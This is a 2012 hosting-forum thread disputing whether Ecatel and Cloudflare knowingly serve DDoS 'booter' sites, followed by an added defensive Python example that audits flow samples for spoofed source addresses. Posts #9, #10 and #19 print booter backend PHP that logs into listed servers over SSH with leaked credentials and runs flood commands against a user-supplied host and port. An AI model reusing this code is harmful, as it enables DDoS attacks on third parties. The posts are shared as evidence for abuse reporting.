Results 1 to 25 of 267
  1. #1
    Join Date
    Aug 2012
    Posts
    96

    Cloudflare and Ecatel working together to help Cyber criminals

    Hello All,

    I am here to inform you all of Ecatel's and Cloudflare's relationship.

    Ecatel want proof of their clients doing anything illegal?

    Well, isn't hosting a PHP Hub to send DDoS attacks illegal?

    Cloudflare say 'no attack traffic comes through our network'. Yes, in my report I didn't say anything about traffic coming through your network.

    Picture of the section - Hackforums has a section dedicated to booters.

    The attack servers are mainly with Ecatel.

    They will deny it on here, but they know it's true.

    They allow people to have a paid box with them. I mean, they allow spoofed attacks outbound, so they don't even get reports about the attacks, so they don't care.

    List of booters :

    http://elitestresser.com/index.php - A Records ,173.245.60.51, 173.245.60.135

    Cloudflare ^

    http://absoboot.com - A Records 108.162.199.99, 108.162.194.198

    Cloudflare ^

    http://quantumbooter.net - A Records ns1.xsltel.com, ns2.xsltel.com, ns3.xsltel.com, ns4.xsltel.com - 80.82.69.148

    Ecatel ^

    List goes on.


    I come here to post the truth because I want something done about these illegal tools on the internet.

    They won't listen to my abuse reports so I'll go public with it.

  2. #2
    Join Date
    Dec 2002
    Location
    Bulgaria
    Posts
    186
    You are posting a well-known fact. I am not sure what you expect to happen. I am sure that it is absolutely clear to everyone that this thread would not change anything. There are hundreds of others just like it. Cloudflare, in reality, did not do absolutely anything, as the traffic indeed does not go through their servers. Ecatel will come and deny it and never would get an abuse report, just because after a reflection UDP DDoS it is next to impossible to track the initial server. Hackforums on the other side claim that they allow advertisement of legal tools for stress testing of own servers.

    My point - just another thread that will die out in a day as no one from here could do anything about it. Ecatel are already well-known for hosting all kinds of **** on their network.

  3. #3
    Join Date
    Apr 2010
    Location
    Canada
    Posts
    1,770
    Quote Originally Posted by LiquidSolutions View Post
    Hackforums on the other side claim that they allow advertisement of legal tools for stress testing of own servers
    This is the kind of thing you would like to shut down but you really can't.
    Maxence H. - UBservers.com
    Specialists in high-performance hosting since 2008!
    Outstanding 24x7 support - Canada, USA, France

    SSD VPS Dedicated Servers SSD Web Hosting

  4. #4
    Join Date
    Jun 2009
    Posts
    1,219
    http://www.secanalyst.org/2011/08/23...anding-ecatel/

    Just one of a few sources that relate Ecatel to the notorious Russian Business Network.
    Last edited by Amitz; 08-14-2012 at 11:26 AM.

  5. #5
    Join Date
    Jun 2006
    Location
    Amsterdam
    Posts
    499
    Anyone can send a report to abuse@ecatel.net (24/7 staffed e-mail). In case of activities which are not allowed by the Dutch laws we will act almost immediately. Please do not forget to send proof and logfiles, we need these to take necessary steps.

    @amitz, ecatel is not part of the RBN network. We are a Dutch ISP providing hosting services since 2004. That's all.

    Report your problem at abuse@ecatel.net first and send some proof with information, I am sure they will help you in that case.

    thanks.

  6. #6
    Join Date
    Aug 2012
    Posts
    96
    Quote Originally Posted by Ecatel View Post
    Anyone can send a report to abuse@ecatel.net (24/7 staffed e-mail). In case of activities which are not allowed by the Dutch laws we will act almost immediately. Please do not forget to send proof and logfiles, we need these to take necessary steps.

    @amitz, ecatel is not part of the RBN network. We are a Dutch ISP providing hosting services since 2004. That's all.

    Report your problem at abuse@ecatel.net first and send some proof with information, I am sure they will help you in that case.

    thanks.
    What proof do you want?



    You said after I emailed you 'proof' of client doing something illegal?

    Well

    Go to the website, the word 'booter' isn't enough for you to smell the ****ing coffee?

    I mean I can go ahead and release a bunch of booter sources I have from providers that have given them to me after reports with the SSH2 PHP code with YOUR IPs still there.

    Would that be enough?

    Are you going to stop this illegal activity going out of your network?

    Stop the spoofing, Ecatel!

  7. #7
    Join Date
    Jun 2009
    Posts
    1,219
    @ecatel: I am not so careless to say that you are part of the RBN. I just say that there are quite a lot of others that claim this. And to be honest: You know that you are not just a Dutch ISP. Your network is one of the worst in terms of spam, botnets and illegal activities. That reputation is your main selling point.

  8. #8
    Join Date
    Dec 2002
    Location
    Bulgaria
    Posts
    186
    Quote Originally Posted by Ecatel View Post
    Anyone can send a report to abuse@ecatel.net (24/7 staffed e-mail). In case of activities which are not allowed by the Dutch laws we will act almost immediately. Please do not forget to send proof and logfiles, we need these to take necessary steps.

    @amitz, ecatel is not part of the RBN network. We are a Dutch ISP providing hosting services since 2004. That's all.

    Report your problem at abuse@ecatel.net first and send some proof with information, I am sure they will help you in that case.

    thanks.
    And you just confirmed what I wrote down.

    Please explain how do you expect to get logs from a spoofed reflection attack, initiated from one of your servers?

    And also the majority, probably 98% of the other providers do not allow spoofing from their network, you still do, which I find majorly shady.

    I get tens of tickets about "Hey, this guy from HFs attacked me" and I literally can not do anything about it, no matter I know where the original server came from, other than just watching how my network pipe gets filled unless I blackhole the IP.

    Anyway, I have already been in this discussion many, many times this year. I am out.

    Gratz

  9. #9
    Join Date
    Aug 2012
    Posts
    96
    <?php
    include('Net/SSH2.php');
    define('NET_SSH2_LOGGING', true);
    $ip = array("94.102.52.144","89.248.160.192","93.174.93.239");
    $ip = $ip[rand(0, count($ip) - 1)];
    $user = "flooder";
    $pass = "FloodYourMother";
    $command = "clientflooder {$_GET["host"]} {$_GET["port"]} GMSA {$_GET["time"]} 100";
    $ssh = new Net_SSH2($ip);
    if (!$ssh->login($user, $pass)) {
    exit('Login Failed');
    }

    echo $ssh->exec($command);

    ?>

    Passwords have since been changed but still..

  10. #10
    Join Date
    Aug 2012
    Posts
    96
    <?php
    include('Net/SSH2.php');
    define('NET_SSH2_LOGGING', NET_SSH2_LOG_COMPLEX);
    $ip = array("89.248.160.213","89.248.172.240","80.82.64.71");
    $ip = $ip[rand(0, count($ip) - 1)];
    $user = "root";
    $pass = "k1a2j397";
    $command = "./ssyn {$_GET["host"]} {$_GET["port"]} {$_GET["time"]}";
    $ssh = new Net_SSH2($ip);
    if (!$ssh->login($user, $pass)) {
    exit('Login Failed');
    }

    echo $ssh->exec($command);

    ?>

    These ones still work I believe. Gonna suspend them, Ecatel, or just offer the client a new IP?

    Passwords don't work but the IPs are still alive; currently there will be no outgoing floods as the criminal's site is offline due to an abuse report. You see, Ecatel, other providers act upon abuse, something you don't.
    Last edited by Eccie; 08-14-2012 at 11:48 AM. Reason: Update.

  11. #11
    Join Date
    Jun 2011
    Location
    Internet
    Posts
    2,985
    Quote Originally Posted by ubservers View Post
    This is the kind of thing you would like to shut down but you really can't.
    All of the "stress testers" don't use their own hardware, so it isn't legal anyway. I'd just drop them if I were cloudflare.

  12. #12
    Join Date
    Aug 2012
    Posts
    96
    Quote Originally Posted by Flapadar View Post
    All of the "stress testers" don't use their own hardware, so it isn't legal anyway. I'd just drop them if I were cloudflare.

    Thanks. Hopefully someone from Cloudflare sees this.

  13. #13
    Join Date
    Jun 2006
    Location
    Amsterdam
    Posts
    499
    Quote Originally Posted by LiquidSolutions View Post
    And you just confirmed what I wrote down.

    Please explain how do you expect to get logs from a spoofed reflection attack, initiated from one of your servers?

    And also the majority, probably 98% of the other providers do not allow spoofing from their network, you still do, which I find majorly shady.

    I get tens of tickets about "Hey, this guy from HFs attacked me" and I literally can not do anything about it, no matter I know where the original server came from, other than just watching how my network pipe gets filled unless I blackhole the IP.

    Anyway, I have already been in this discussion many, many times this year. I am out.

    Gratz
    We monitor our customers' network ports; when a customer server is hacked and sending a DDoS attack we see a high difference in traffic, or peaks with a straight line. In that case we act ourselves if there is no report and suspend the customer's server.

    If you receive a DDoS attack from someone, that doesn't mean it comes from us. There are many other providers out there as well. If you think someone is sending a DDoS out of our network you can always e-mail and we sflow the customer's traffic for confirmation. If it appears you are right we shut down the customer.

  14. #14
    Join Date
    Feb 2012
    Posts
    276
    Quote Originally Posted by Ecatel View Post
    We monitor our customers' network ports; when a customer server is hacked and sending a DDoS attack we see a high difference in traffic, or peaks with a straight line. In that case we act ourselves if there is no report and suspend the customer's server.

    If you receive a DDoS attack from someone, that doesn't mean it comes from us. There are many other providers out there as well. If you think someone is sending a DDoS out of our network you can always e-mail and we sflow the customer's traffic for confirmation. If it appears you are right we shut down the customer.
    I don't believe you.

    You see the booter on your network in the OP

    What are you going to do to that?

    XSLTel is a criminal.

    Remove them from your network.

    They have a lot of illegal things on your network.

    There was a thread on here a few weeks ago about him being in a hacking clan and using your network to send flood.

    I believe his servers were all suspended at one point due to sending 10gbit of flood.

    That's what I was informed.
    Last edited by JackS00; 08-14-2012 at 12:09 PM. Reason: Spelling mistake.

  15. #15
    Join Date
    Jun 2006
    Location
    Amsterdam
    Posts
    499
    Quote Originally Posted by Amitz View Post
    @ecatel: I am not so careless to say that you are part of the RBN. I just say that there are quite a lot of others that claim this. And to be honest: You know that you are not just a Dutch ISP. Your network is one of the worst in terms of spam, botnets and illegal activities. That reputation is your main selling point.
    Many people who do not know what they are talking about say we host spam, botnets, malware etc. Like you, posting a link from 2011 which doesn't make any sense. The writer of that article is talking pure nonsense. Do you know any malware websites? Message them to me and we shut them down. We have had a VERY tight policy against spam and malware for years. Many of our customers can confirm we are VERY difficult if it appears our customer is hosting spam or malware. Also see:

    http://noc.ecatel.net/ecatel-abuse.html

  16. #16
    Join Date
    Jun 2011
    Location
    Internet
    Posts
    2,985
    Quote Originally Posted by Ecatel View Post
    We monitor our customers' network ports; when a customer server is hacked and sending a DDoS attack we see a high difference in traffic, or peaks with a straight line. In that case we act ourselves if there is no report and suspend the customer's server.

    If you receive a DDoS attack from someone, that doesn't mean it comes from us. There are many other providers out there as well. If you think someone is sending a DDoS out of our network you can always e-mail and we sflow the customer's traffic for confirmation. If it appears you are right we shut down the customer.
    Out of curiosity - a lot of people in the thread mentioned source spoofing. Do you guys allow that for specific (legitimate) usage, or is it enabled for everyone?

    If the second it might be worth moving toward the first to stop stuff like this.

  17. #17
    Join Date
    Jun 2006
    Location
    Amsterdam
    Posts
    499
    Quote Originally Posted by DotVPS-J View Post
    I don't believe you.

    You see the booter on your network in the OP

    What are you going to do to that?

    XSLTel is a criminal.

    Remove them from your network.

    They have a lot of illegal things on your network.

    There was a thread on here a few weeks ago about him being in a hacking clan and using your network to send flood.

    I believe his servers were all suspended at one point due to sending 10gbit of flood.

    That's what I was informed.
    We don't remove someone because of their reputation. Some people informed us about this thread you mention. I can assure you they *did not* use our network for any attacks. If this had happened we would have already shut down the servers!

    And also you, as an old customer of ours, know we are against criminal activities. We have a very active abusedesk.

  18. #18
    Join Date
    Feb 2012
    Posts
    276
    Quote Originally Posted by Ecatel View Post
    We don't remove someone because of their reputation. Some people informed us about this thread you mention. I can assure you they *did not* use our network for any attacks. If this had happened we would have already shut down the servers!

    And also you, as an old customer of ours, know we are against criminal activities. We have a very active abusedesk.
    Yes I know you were pretty good at abuse reports I'll give you that but I don't understand why you are allowing a booter to be on your network?

  19. #19
    Join Date
    Jun 2006
    Location
    Amsterdam
    Posts
    499
    Quote Originally Posted by Eccie View Post
    <?php
    include('Net/SSH2.php');
    define('NET_SSH2_LOGGING', NET_SSH2_LOG_COMPLEX);
    $ip = array("89.248.160.213","89.248.172.240","80.82.64.71");
    $ip = $ip[rand(0, count($ip) - 1)];
    $user = "root";
    $pass = "k1a2j397";
    $command = "./ssyn {$_GET["host"]} {$_GET["port"]} {$_GET["time"]}";
    $ssh = new Net_SSH2($ip);
    if (!$ssh->login($user, $pass)) {
    exit('Login Failed');
    }

    echo $ssh->exec($command);

    ?>

    These ones still work I believe. Gonna suspend them, Ecatel, or just offer the client a new IP?

    Passwords don't work but the IPs are still alive; currently there will be no outgoing floods as the criminal's site is offline due to an abuse report. You see, Ecatel, other providers act upon abuse, something you don't.
    Hello,

    Have you already contacted our abusedesk? It is possible the customer is indeed using these servers for criminal activities, or the servers of our customer are hacked and abused for DDoS attacks. I will forward it to abuse and will ask them for the status on this case.

  20. #20
    Join Date
    Jun 2006
    Location
    Amsterdam
    Posts
    499
    Quote Originally Posted by DotVPS-J View Post
    Yes I know you were pretty good at abuse reports I'll give you that but I don't understand why you are allowing a booter to be on your network?
    We don't allow that. But to act on a report we need proof the servers are indeed used for criminal activities. If a domain is hosted on an IP this can be a shared server (hosting multiple domains) or a VPS account. We always first give our customers the opportunity to take action against the matter themselves before we start nullrouting IPs.

  21. #21
    Join Date
    Aug 2012
    Posts
    96
    Quote Originally Posted by Ecatel View Post
    Hello,

    Have you already contacted our abusedesk? It is possible the customer is indeed using these servers for criminal activities, or the servers of our customer are hacked and abused for DDoS attacks. I will forward it to abuse and will ask them for the status on this case.
    I didn't forward it to abuse as I thought you would just offer them a new IP and it would be a waste of my time.

  22. #22
    Join Date
    Aug 2012
    Posts
    96
    Quote Originally Posted by Ecatel View Post
    We don't allow that. But to act on a report we need proof the servers are indeed used for criminal activities. If a domain is hosted on an IP this can be a shared server (hosting multiple domains) or a VPS account. We always first give our customers the opportunity to take action against the matter themselves before we start nullrouting IPs.
    Yes indeed it does look like XSLTel's shared service it's hosted upon, however shouldn't the provider be pro-actively looking for this content?

  23. #23
    Join Date
    Aug 2012
    Posts
    96
    I feel much better now that Ecatel have heard what I have to say.

    Now I need to hear from Cloudflare.

  24. #24
    Join Date
    Jun 2006
    Location
    Amsterdam
    Posts
    499
    @eccie, we checked your report!

    89.248.160.213 = was already terminated a few days ago by our abuse dept.
    89.248.172.240 = VPS server from one of our customers, we indeed see peaks to 500 mbit. We have contacted our customer and ratelimited the server to 100 mbit.
    80.82.64.71 = We also see peaks to 500 mbit on this server. Also a VPS server located on a node of one of our resellers; server has been ratelimited to 100 mbit temporarily and customer was contacted.

    I can confirm to you that all three IPs mentioned here are *not* owned by or have anything to do with xsltel at all.

  25. #25
    Join Date
    Aug 2012
    Posts
    96
    Quote Originally Posted by Flapadar View Post
    Out of curiosity - a lot of people in the thread mentioned source spoofing. Do you guys allow that for specific (legitimate) usage, or is it enabled for everyone?

    If the second it might be worth moving toward the first to stop stuff like this.
    From what I have read on hackforums, it's enabled on all 1000mbit servers but the users can't do it on 100mbit port servers...

    Whatever you did to those 100mbit's, Ecatel, you should do to the 1000mbits too!!
      0 Not allowed!
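
Editor's added example, not written by any poster in this thread and not any provider's actual tooling: the thread turns on whether a host lets customers send packets with forged source addresses, and on sFlow being available to confirm reports. The sketch below audits sampled flow records per customer port against the prefixes assigned to that port (source-address validation as described in BCP 38); the port names, prefixes, sample records and sampling rate are all constructed.

```python
import ipaddress
from collections import defaultdict

# Constructed data: prefixes assigned to each customer port (documentation ranges).
ASSIGNED = {
    "port-a": ["192.0.2.0/28"],
    "port-b": ["198.51.100.16/29", "2001:db8:10::/64"],
}

# Constructed flow samples for traffic entering the provider from a customer
# port: (port, source address, destination address, bytes in sampled packet).
SAMPLES = [
    ("port-a", "192.0.2.5", "203.0.113.9", 120),
    ("port-a", "192.0.2.14", "203.0.113.9", 400),
    ("port-b", "198.51.100.18", "203.0.113.50", 90),
    ("port-b", "203.0.113.200", "192.0.2.99", 64),      # not assigned to port-b
    ("port-b", "203.0.113.200", "192.0.2.100", 64),
    ("port-b", "2001:db8:10::7", "2001:db8:ffff::1", 80),
    ("port-b", "2001:db8:99::1", "2001:db8:ffff::1", 80),  # wrong IPv6 prefix
    ("port-c", "192.0.2.5", "203.0.113.9", 60),         # port with no assignment
]


def load_prefixes(assigned):
    """Parse the per-port prefix strings into network objects."""
    return {port: [ipaddress.ip_network(p) for p in prefixes]
            for port, prefixes in assigned.items()}


def source_is_assigned(prefixes, port, source):
    """True only if the source lies inside a prefix assigned to this port.
    Unknown ports and unparsable addresses fail closed."""
    try:
        addr = ipaddress.ip_address(source)
    except ValueError:
        return False
    return any(addr.version == net.version and addr in net
               for net in prefixes.get(port, []))


def audit(samples, assigned, sampling_rate=1):
    """Per-port counts of samples whose source the port was never assigned.
    bad_bytes_est scales sampled bytes by the 1-in-N sampling rate."""
    prefixes = load_prefixes(assigned)
    report = defaultdict(lambda: {"samples": 0, "bad_samples": 0,
                                  "bad_bytes_est": 0, "bad_sources": set()})
    for port, src, _dst, size in samples:
        row = report[port]
        row["samples"] += 1
        if not source_is_assigned(prefixes, port, src):
            row["bad_samples"] += 1
            row["bad_bytes_est"] += size * sampling_rate
            row["bad_sources"].add(src)
    return dict(report)


def ports_needing_filter(report, max_bad_fraction=0.0):
    """Ports whose share of unassigned-source samples exceeds the threshold."""
    return sorted(port for port, row in report.items()
                  if row["bad_samples"] / row["samples"] > max_bad_fraction)
```

A port that shows any unassigned sources is a candidate for an ingress ACL or strict unicast reverse-path filtering on the customer-facing interface, which drops the forged packets regardless of port speed.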
